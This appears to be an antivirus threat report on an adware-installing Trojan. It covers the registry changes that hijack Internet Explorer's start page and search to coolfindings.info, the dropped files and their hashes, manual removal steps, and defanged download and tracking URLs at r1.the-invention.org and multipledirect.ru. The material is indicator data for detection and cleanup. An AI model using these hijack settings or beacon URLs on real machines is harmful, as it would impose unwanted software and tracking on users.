"DefaultScope" = "{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"51652492" = "///%"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"b2cc84ee" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD/SxAm/Ch/VP/v/YD/OP////%%"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"ef34a9f6" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"05502537" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/UlAv/XD/cxAp/XV/alAj/B2/HPAs/X6////%"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"URL" = "websearch.coolfindings.info/?l=1&q={searchTerms}&pid=24379&r=2015/07/01&hid=8738532578695851691&lg=EN&cc=UA"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"d7cea243" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"d7cea243" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "websearch.coolfindings.info/?pid=24379&r=2015/07/01&hid=8738532578695851691&lg=EN&cc=UA"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"94362f76" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"94362f76" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"fd0dde78" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"d7cea243" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"05502537" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/UlAv/XD/cxAp/XV/alAj/B2/HPAs/X6////%"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"URL" = "websearch.coolfindings.info/?l=1&q={searchTerms}&pid=24379&r=2015/07/01&hid=8738532578695851691&lg=EN&cc=UA"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"94362f76" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"05502537" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/UlAv/XD/cxAp/XV/alAj/B2/HPAs/X6////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"d7cea243" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"94362f76" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"fd0dde78" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"fd0dde78" = "dlAB/DZ/Ml/h/DP/QP/ /Ct/UPAB/DV/M/AC/Bh/M//e/Cb/Vx/i/Ct/PPAC/CP/UP/1/CV/Vl/e/CJ/Qx/1/CD/PlAX/DF/QPA7////"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"Deleted"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"Deleted"

Dropped PE files

MD5 File path
5b4046db8f3c698418f9b2b51d8c292fc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\1F50\temp\NybbleCrawler.xyz.exe
2d3705d26f35d66e26b7300384bc01dcc:\Program Files\CutThePrIcE\F9Kz7xj8t8M4Vo.dll
2e1bb4d22880abbf5df8f4343e16c356c:\Program Files\CutThePrIcE\F9Kz7xj8t8M4Vo.exe
c9456944ec1989ab0e2bf9e23df1c952c:\Program Files\CutaThePrice\CutaThePrice.exe
f3cf89605ef83f1f6e4ffbfb8b6cef70c:\Program Files\TerminusKeeper\TerminusKeeper.dll
635d528b505f4ffa3a6b4aea855c5001c:\Program Files\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.exe
6e7027aac3d75239fa9684eb5a8863c4c:\Program Files\bestadblocker\tEp7pMPAVoxXWr.dll
34b46fb135e5264c60ddcf36b0c718bdc:\Program Files\bestadblocker\tEp7pMPAVoxXWr.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1304
    %original file name%.exe:996
    %original file name%.exe:592
    %original file name%.exe:1936
    %original file name%.exe:440
    NybbleCrawler.xyz.exe:356
    rundll32.exe:1256
    regsvr32.exe:2008
    regsvr32.exe:1784
    hpds_setup.exe:164

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_1.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_4.ini.tmp (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_2.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_3.ini.tmp (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_1.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\8[1].txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\images\progressbar.gif (15 bytes)
    %WinDir%\Tasks\Bidaily Synchronize Task[973b].job (450 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\6_2[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_2.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_5.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\6_1_3[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\7_3_1[1].txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_1_1.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\%original file name%.exe (8816 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\4_3[1].txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\7_1_1[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_3_1.ini.tmp (6 bytes)
    %Documents and Settings%\%current user%\Desktop\52eea08e054915129f2638d8012a38f6.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\3.ini.txt (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\3[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\6_1_2[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_2.ini.tmp (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\7_1[1].txt (392 bytes)
    %Documents and Settings%\All Users\Application Data\{76f98d01-d66f-efbc-76f9-98d01d663407}\%original file name%.exe (8816 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\bg.ca.part (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_2.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\7_2[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task.ini (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7_3[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(2).ini (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\3.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7.ini.txt (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\6_1_4[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\5.ini.tmp (14 bytes)
    %Documents and Settings%\All Users\Application Data\{76f98d01-d66f-efbc-76f9-98d01d663407}\52eea08e054915129f2638d8012a38f6.dat (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\6[1].txt (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\6_1[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\7_5[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_3.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_2_1.ini.tmp (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6.ini.tmp (1184 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(4).ini (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.the-invention[1] (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\4_1[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_3.ini.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\images\loader.gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1.ini.tmp (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\8.ini.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\5[1].txt (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\4[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\NybbleCrawler.xyz.exe (27635 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(3).ini (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\4_2[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\6_2_1[1].txt (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6D10\images\loader.gif (2 bytes)
    %Program Files%\bestadblocker\tEp7pMPAVoxXWr.dll (6693 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\820cb716dd7864a479458114e3582eab.ini (514 bytes)
    %Program Files%\bestadblocker\tEp7pMPAVoxXWr.tlb (13 bytes)
    %Program Files%\bestadblocker\tEp7pMPAVoxXWr.dat (42 bytes)
    %Program Files%\bestadblocker\tEp7pMPAVoxXWr.exe (3572 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\dB1XJloRgbF4Qw[1].ca (133377 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6D10\images\progressbar.gif (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3b805d70\temp.ca.part (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2ea510b5\temp.ca.part (119356 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\r1.the-invention[1] (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5E80\images\progressbar.gif (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\290e9ce2\temp.ca.part (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\g7CyPVZagCsRV8[1].ca (134158 bytes)
    %Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.tlb (13 bytes)
    %Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.exe (3572 bytes)
    %Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dll (6693 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5E80\images\loader.gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\0284a4af\temp.ca.part (153797 bytes)
    %Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dat (44 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\e605d3cdf72e06d079458114e3582eab.ini (512 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\DAE0\images\progressbar.gif (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\DAE0\images\loader.gif (2 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\9b4263a9124509d379458114e3582eab.ini (297 bytes)
    %Program Files%\CutaThePrice\CutaThePrice.dat (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\0903733f\temp.ca.part (24208 bytes)
    %Program Files%\CutaThePrice\CutaThePrice.exe (3572 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1829a50e\temp.ca.part (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\hVwDePRrG2aSqC[1].ca (35544 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\fyBYRfMAYKA66R[1].ca (33816 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2e71167f\temp.ca.part (6 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\bab831a24b139eab79458114e3582eab.ini (328 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\FF0\images\loader.gif (2 bytes)
    %Program Files%\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.exe (3572 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1993275e\temp.ca.part (29136 bytes)
    %Program Files%\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.dat (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\FF0\images\progressbar.gif (15 bytes)
    %Program Files%\TerminusKeeper\TerminusKeeper.dll (189078 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tf071a6d8c.dll (20506 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text409647280476164.4024137d612d6a9acb8f84028f2746ecfb55f
.rdata532481410361413125.41827592d08be8b4356e664ca45751ece4f2c
.data19660828948215040.9047468c041560eefe8cbc360ca9f34a66f7b9
.rsrc22937617904179204.4219470bd0d0b9733e9bf46a2af29c22a6241
.reloc249856476651203.19352cac48ca405a5247f77ff5eb0ad24c76c

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL IP
hxxp://r1.the-invention.org/54.148.216.39
hxxp://r1.the-invention.org/?step_id=3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A54.148.216.39
hxxp://r1.the-invention.org/?step_id=4&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A54.148.216.39
hxxp://r1.the-invention.org/?step_id=4_1&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A54.148.216.39
hxxp://r1.the-invention.org/?step_id=4_2&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A54.148.216.39
hxxp://r1.the-invention.org/?step_id=4_3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A54.148.216.39
hxxp://r1.the-invention.org/?step_id=5&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A54.148.216.39
hxxp://r1.the-invention.org/?step_id=6&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A54.148.216.39
hxxp://r1.the-invention.org/?step_id=6_1&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A54.148.216.39
hxxp://multipledirect.ru/?e=eghjkt&cht=2&dcu=1&cpatch=2&dcs=1&pf=1&clsb=1&publisher=24379&&dd=4&country=UA&ind=2249414903470210647&exid=0&ssd=16580608941307095478&hid=8738532578695851691&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140701&cha=054.149.75.132
